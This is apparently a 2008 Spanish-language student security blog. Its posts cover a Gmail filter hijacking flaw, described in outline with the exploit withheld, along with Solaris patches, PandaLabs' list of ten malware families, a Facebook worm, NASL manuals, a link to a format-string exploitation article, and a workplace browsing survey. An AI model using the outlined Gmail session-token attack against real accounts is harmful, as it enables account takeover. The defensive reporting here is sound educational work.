Sin publicar el exploit por completo, aquí está la clave cuando se explica que este se basa en obtener las variables que representan el nombre de usuario y el "at":


"Cuando uno crea un filtro en su cuenta de Gmail, se envía un requerimiento a los servidores de Google para que sea procesado. El requerimiento se realiza con la forma de una URL con varias variables. Por razones de seguridad, su navegador no muestra todas las variables que hay en la URL. Usando Firefox y un agregado que se llama Live HTTP Headers (encabezados HTTP en vivo), uno puede ver exactamente que variables son enviadas desde su navegador hacia los servidores de Google.
Después de eso, un atacante sólo necesita identificar la variable que es el equivalente de el nombre de usuario.

"Obtener esta variable es difícil pero posible," dice el autor. "No voy a decir como lograrlo, si uno busca suficiente en Internet logrará averiguarlo."

La variable "at" puede ser obtenida visitando sitios Web maliciosos, comenta el autor, quien sugiere que Google haga que la variable "at" expire después de cada requerimiento en lugar de después de cada sesión [como es ahora].

Para evitar ser una víctima de la vulnerabilidad, los usuarios debe verificar a menudo sus filtros. Los usuarios de Firefox pueden descargar una extensión llamada NoScript que ayuda a prevenir estos ataques, dice.

Por supuesto, cualquier sitio Web que use cookies para pedidos de autenticación puede ser aprovechada de la misma forma. Para evitar convertirse en una víctima de este tipo de exploit, los usuarios de Gmail deben cerrar su sesión cuando no la usan, y por supuesto no visitar sitios Web en los que no confíen.


Fuente: news.cnet.com

jueves, 20 de noviembre de 2008

El arte de la guerra

Hola, por si aún no han conseguido el libro de Sun Tzu "El Arte de la Guerra"; les dejo este link donde pueden descargarlo en formato pdf.

http://www.nacioncamba.net/PDFS/el_arte_de_la_guerra.pdf

sábado, 15 de noviembre de 2008

NASL2 Reference Manual

Hello I want to share with you this manual
because I´m sure that we'll need it, to do the plugin that the teacher left us.
The url is

http://michel.arboi.free.fr/nasl2ref/nasl2_reference.pdf

Good luck

¿Alguien había escuchado sobre World Community Grid?

Hoy uno de mis amigos me pidió que me uniera a esta comunidad, yo no sabía que era y así que me puse a investigar...

El Proyecto 'World Community Grid' lanzado por la multinacional IBM en noviembre de 2005 para combatir enfermedades como el sida o la investigación médica a través del aprovechamiento de la capacidad no utilizada de las computadoras personales, ha realizado 2.000 billones de cálculos gracias a 190.000 personas repartidas en 185 países. Con ellos, se han completado en menos de diez meses análisis que hubiesen tardado cien años.

'World Community Grid' es una iniciativa de carácter mundial que se basa en el uso de la capacidad no utilizada de las computadoras personales de particulares y empresas, cuando están disponibles, para crear una red mundial dedicada a investigar sobre enfermedades, desastres naturales y problemas medioambientales. Se estima que hay más de 650 millones de ordenadores personales en el mundo, y cada uno de ellos es un potencial participante en la 'World Community Grid'.

La tecnología de redes Grid consiste en la conexión, a través de Internet, de miles o de millones de esos ordenadores para crear un "sistema virtual" de gran capacidad, incluso superior a la de algunos superordenadores.

IBM ha donado el hardware, el software y los servicios técnicos necesarios para crear la infraestructura tecnológica que precisa esta iniciativa. Además, proporciona servicios de alojamiento, mantenimiento y asistencia técnica.

El primer proyecto que se ha desarrollado a través del 'World Community Grid' es 'Proteome Holdin (plegado de proteínas humanas), que tiene como finalidad identificar el proteoma humano. Su resultado ha sido la creación de una base de datos que contempla la estructura de al menos 120.000 proteínas.

Este proyecto supone una ayuda de gran valor para los científicos que tratan de identificar tratamientos para la curación de distintas enfermedades habiéndose conseguido en un solo año lo que de otra manera, con los ordenadores más potentes, hubiera tardado al menos un siglo.

En el caso del 'FightAIDS@Home' (lucha contra el sida desde casa), otra de las iniciativas llevadas a cabo por esta comunidad mundial, actualmente más de 165.000 usuarios están ayudando en la investigación sobre nuevos tratamientos contra la enfermedad en este nuevo proyecto. El objetivo es encontrar nuevas terapias para combatir la enfermedad.

Todos proyectos son seleccionados por un Comité Asesor, que evalúa las propuestas de entidades científicas y organizaciones sin ánimo de lucro. El Comité está formado por personalidades de instituciones como la Universidad de Oxford, la Clínica Mayo o la Organización Mundial de la Salud (OMS), entre otras, aunque cualquier centro de investigación puede proponer proyectos para ser llevados a cabo con esta red.


Investigaciones Activas

  • FightAIDS@Home (Lanzado el 21 de noviembre de 2005)
  • AfricanClimate@Home (Lanzado el 3 de septiembre de 2007)
  • Discovering Dengue Drugs - Together (Lanzado el 21 de agosto de 2007)
  • Help Cure Muscular Dystrophy (Lanzado el 19 de diciembre de 2006)
  • Human Proteome Folding (Pliegue del Proteoma Humano) - Fase 2 (Lanzado el 23 de junio de 2006) de
  • Help Conquer Cancer (Lanzado el 6 de noviembre de 2007)

Investigaciones Completadas

  • Fiocruz Genome Comparison (Comparación del Genoma) (Lanzado el 15 de noviembre de 2006)
  • Help Defeat Cancer (Ayude a Derrotar el Cáncer) (Lanzado el 20 de julio de 2006)
  • Proyecto Human Proteome Folding (Lanzado el 11 de noviembre de 2004, Completado el 18 de julio de 2006)


"El éxito de las investigaciones depende de que los individuos colectivamente contribuyan con su tiempo no utilizado de computación para mejorar el mundo.
"


¿Qué opinan de esto? es muy interesante, verdad!!!

Hola!

Les dejo aqui una liga de una guia de referencia sobre NASL, espera les sirva de ayuda.

http://www.virtualblueness.net/nasl.html#tth_sEc1.1

lunes, 3 de noviembre de 2008

Puntuación para el cálculo del CVSS

http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2

Actualización del kernel para Sun Solaris 8, 9, 10 y OpenSolaris

Sun ha dado a conocer un fallo en el kernel de Solaris que permitiría a usuarios locales eludir restricciones de seguridad.
La vulnerabilidad reside en un error en el kernel relacionado con las llamadas al sistema. Un atacante podría saltarse el modo multi-nivel en la política de seguridad de Solaris Trusted Extensions o en la política de aislamiento por zonas, chroot.

Sun ha publicado los siguientes parches disponibles, según versión y plataforma:

Para la plataforma SPARC:

* Solaris 8 aplicar actualización 117350-56 o superior, desde:
http://sunsolve.sun.com/search/document.do?assetkey=1-21-117350-56-1

* Solaris 9 aplicar actualización 122300-30, desde:
http://sunsolve.sun.com/search/document.do?assetkey=1-21-122300-30-1

* Solaris 10 aplicar actualización 137111-05, desde:
http://sunsolve.sun.com/search/document.do?assetkey=urn:cds:docid:1-21-137111-05-1

* OpenSolaris actualizar a snv_90 o superior.

Para plataforma x86:

* Solaris 8 aplicar actualización 117351-56 desde:
http://sunsolve.sun.com/search/document.do?assetkey=urn:cds:docid:1-21-117351-56-1

* Solaris 9 aplicar actualización 122301-30, desde:
http://sunsolve.sun.com/search/document.do?assetkey=urn:cds:docid:1-21-122301-30-1

* Solaris 10 aplicar actualización 137112-05, desde:
http://sunsolve.sun.com/search/document.do?assetkey=urn:cds:docid:1-21-137112-05-1

* OpenSolaris actualizar a snv_90 o superior.

10 VIRUS DE TERROR

Además de los disfraces y los dulces, el Halloween también trae consigo amenazas cibernéticas, que pueden causar serios estragos en tu computadora.

Muchos ejemplares de malware eligen vistosos disfraces para que los usuarios los dejen entrar, pero en ellos lo que da miedo no es su disfraz, sino sus efectos, advirtió la firma de protección PandaLabs.

Ubica los virus y evitalos:
1. Tixcet.A: Disfrazado de archivo de Microsoft Word, este gusano intentará colarse en la fiesta de los usuarios con el fin de eliminar archivos de diversas extensiones (.DOC, .MP3, .MOV, .ZIP, .JPG, entre otras), convirtiendo así la noche de Halloween en una auténtica noche de terror, puesto que serán muchos los que griten con pánico al ver que han perdido todas sus fotos, vídeos, canciones y documentos.

2. Antivirus2008pro: Este malware es uno de los más ingeniosos. Para colarse en las casas, se disfraza de antivirus gratuito. De esta manera, consigue que muchos le abran la puerta. Sin embargo, no tardan en gritar de terror, puesto que en seguida comenzará a mostrarles infecciones que realmente no tienen y no parará hasta que, desesperados, los usuarios accedan a comprar la versión de pago del antivirus. Un buen invitado si quieres que tu noche de Halloween dé auténtico miedo.

3. Goldun.TB: Este ladronzuelo se disfraza de archivo adjunto en un correo electrónico que anuncia la suspensión del servicio de Internet para colarse en los ordenadores, pero una vez allí lo que realmente hace es robar contraseñas e información de sistemas de pago electrónico. Un mal invitado para la noche de Halloween, ya que puede terminar robándote todo tu dinero, por muy bien guardado que lo tengas.

4. Baker.LGC: También conocido como el falso Fernando Alonso, este troyano se cuela en las máquinas de los usuarios disfrazado de una falsa noticia que anuncia un accidente sufrido por el piloto español de fórmula uno. Con este disfraz, Banker.LGC se gana la confianza de los usuarios para robarles sus datos bancarios y así hacerse con su dinero.

5. Turkojan.I: Este troyano lleva uno de los disfraces más atractivos, puesto que se hace pasar por un capítulo nuevo de la serie de dibujos animados Los Simpson. Debido a esto, muchos fans le abren la puerta, sin embargo, su aspecto real es mucho más terrorífico, puesto que se trata de un código malicioso que dañará el ordenador de los usuarios. Estamos ante un dibujo animadoque da miedo.

6. Banbra.FXT: El disfraz de este troyano para la noche de Halloween es el de funcionario brasileño. Haciéndose pasar por un correo electrónico del Ministerio Público Federal de Brasil, este troyano desvalijará las cuentas bancarias de aquellos usuarios que se fíen de él y se dejen engañar por su disfraz.

7. AutoKitty.A: Debido a su simpático icono de Hello Kitty, muchos se pueden sentir tentados a dejar pasar a estos este ejemplar de malware, sin embargo, bajo su inocente apariencia se encuentra un gusano que realiza numerosas modificaciones en el Registro de Windows, lo que imposibilita que el ordenador funcione con total normalidad. Muchos sentirán auténtico miedo cuando vean que su ordenador no funciona por culpa de este ejemplar de malware.

8. PHilto.A: ¿La famosa Paris Hilton en tu fiesta de Halloween? ¡No! Bajo el disfraz de vídeo de Paris Hilton, se esconde este troyano diseñado para descargar el adware detectado como NaviPromo en tu ordenador.

9. MeteorBot.A: ¿Qué es: un pájaro, un avión? ¿Superman? ¡No! Este backdoor llega a los ordenadores con el disfraz de superman, pero no se trata de un superhéroe, sino de un supervillano diseñado para robar información sobre el ordenador, como dirección IP, nombre de la máquina o sistema operativo.

10. PGPCoder.E: Una de las formas más seguras de que una fiesta de Halloween fracase es invitar a este troyano, ya que dejará la fiesta sin música, sin vídeos, sin fotos, Y es que su misión es cifrar todos los archivos del ordenador, tanto de música como de vídeo, texto, fotografía y otros muchos. Su disfraz no es muy ingenioso, puesto que avisa al usuario diciendo que sus archivos no están cifrados y que debería cifrarlos, sin embargo, sus resultados lo convierten en uno de los invitados más temibles para cualquier fiesta de Halloween.

Exploiting Format String Vulnerabilities

The article will try to explain the structure of the vulnerability and later use this knowledge to build sophisticated exploits. It will show you how to discover format string vulnerabilities in C source code, and why this new kind of vulnerability is more dangerous than the common buffer overflow vulnerability.

http://doc.bughunter.net/format-string/exploit-fs.html

Gusano malicioso en Facebook

Como sabemos, hoy en día está de moda el tener una cuenta en algún tipo de red social, por ejemplo, Facebook, en donde los usuarios no toman las medidas necesarias para mantener segura su información personal y es allí de donde se aprovechan los intrusos.

Fortinet ha detectado un gusano malicioso en Facebook que está utilizando Google Reader (una aplicación para organizar y acceder a tus sitios web más visitados) y Picasa, para que así los usuarios al acceder descarguen el código malicioso en sus equipos. Esta nueva amenaza utiliza ingeniería social para obtener información confidencial de los usuarios.

La estrategia que utiliza es simple y efectiva: un mensaje malicioso es enviado a los amigos del usuario infectado, invitándoles a visitar una página que contiene un video pero que para verlo necesitan descargan un códec especial. Como era de esperarse, dicho códec no es más que un troyano.

¿Pero cómo es que muchas personas quedan infectados? es muy fácil, el salto a través de Google Reader o Picada le da la sensación al usuario de que el video está guardado en Google, por lo que supone que debería ser seguro, y si le añadimos que el mensaje fue enviado por un amigo, hace que disminuya la cautela del usuario.

Por lo que hay que tener mucho cuidado con los archivos que descarguemos, navegar en un sistema que cuente con actualizaciones de seguridad, tener un antivirus actualizado, etc. Cualquiera puede caer en el engaño por lo cual debemos de estar protegidos.


Fuente: http://www.laflecha.net/canales/seguridad/noticias/alertan-de-un-gusano-malicioso-en-facebook

sábado, 1 de noviembre de 2008

El 95% de los empleados ponen en riesgo la SI en su empresa.

Websense dio a conocer los resultados de su encuesta Web@Work 2008 sobre el uso que los empleados hacen de Internet cuando están en su puesto de trabajo y de cómo sus hábitos de navegación influyen en la seguridad informática de la empresa.


El estudio refleja por un lado el alto índice de empleados que utilizan su computadora para navegar por páginas que no están relacionadas con su actividad laboral en horas de trabajo (un 95% de los empleados) y por otro, la preocupación de los miembros del departamento de IT sobre el tipo de páginas que visitan los empleados lo cual los deja expuestos a amenazas externas.
La actividad que más temor despierta entre los miembros del departamento de IT y que se ha incrementado respecto a los datos del 2007 es el hecho de poder enviar un e-mail a una dirección equivocada. Si el año anterior la cifra se situaba en un 15%, la nueva encuesta revela que este año, un 40% de trabajadores admitieron haber mandado un correo electrónico a una dirección equivocada. Esto corrobora otro ambiente de riesgo de negocio corporativo: la fuga de información interna confidencial.
Resultados de la Encuesta Web@Work América Latina 2008:

Tiempo de conexión
Un 95% de los empleados de compañías grandes de América Latina pasan parte de su tiempo de trabajo navegando por Internet por razones personales. • Un 49% de los gerentes medios admiten que pasan más de 50 minutos diarios navegando por páginas que no están relacionadas con su actividad laboral.

Actividades en línea no deseables
El 95% de los gerentes del departamento de IT están preocupados sobre el comportamiento en línea de los empleados, y más del 75% de los empleados admitieron haber hecho alguna actividad de riesgo para la información contenida en la computadora.
El uso de la mensajería instantánea es otra de las preocupaciones de los responsables del departamento de IT ya que un 62% de los empleados lo usa en horas de trabajo, aunque un 76% dice usarlo por motivos laborales. • Otro punto de atención es el uso de las conexiones inalámbricas con las computadoras que son propiedad de la empresa cuando se viaja o se trabaja de forma remota, sobre lo que un 36% de empleados han admitido utilizar.

Visita a webs personales
En general, más de un 98 % de los empleados han accedido a páginas no relacionadas con su actividad laboral durante horas de trabajo y el 64% tienen el hábito de visitar hasta 5 páginas diferentes. • Las páginas más consultadas por el empleado en la oficina y que no tienen relación con su actividad laboral son: banca y finanzas (77%), noticias, páginas gubernamentales y correo personal (un 75%).

Fuente: http://www.websense.com/global/es/PressRoom/PressReleases/PressReleaseDetail/?Release=0810071719